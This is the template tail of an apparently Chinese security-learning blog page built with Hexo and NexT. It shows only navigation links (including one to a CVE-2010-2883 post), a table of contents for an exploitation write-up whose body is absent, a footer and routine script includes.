              <a href="/2019/07/06/CVE-2010-2883-Adobe-Reader栈溢出漏洞/" rel="next" title="CVE-2010-2883 Adobe Reader栈溢出漏洞">
                <i class="fa fa-chevron-left"></i> CVE-2010-2883 Adobe Reader栈溢出漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/18/ptmalloc源码分析/" rel="prev" title="ptmalloc源码学习">
                ptmalloc源码学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#题目描述"><span class="nav-number">1.</span> <span class="nav-text">题目描述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#利用过程"><span class="nav-number">2.</span> <span class="nav-text">利用过程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#参考"><span class="nav-number">3.</span> <span class="nav-text">参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder"></span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
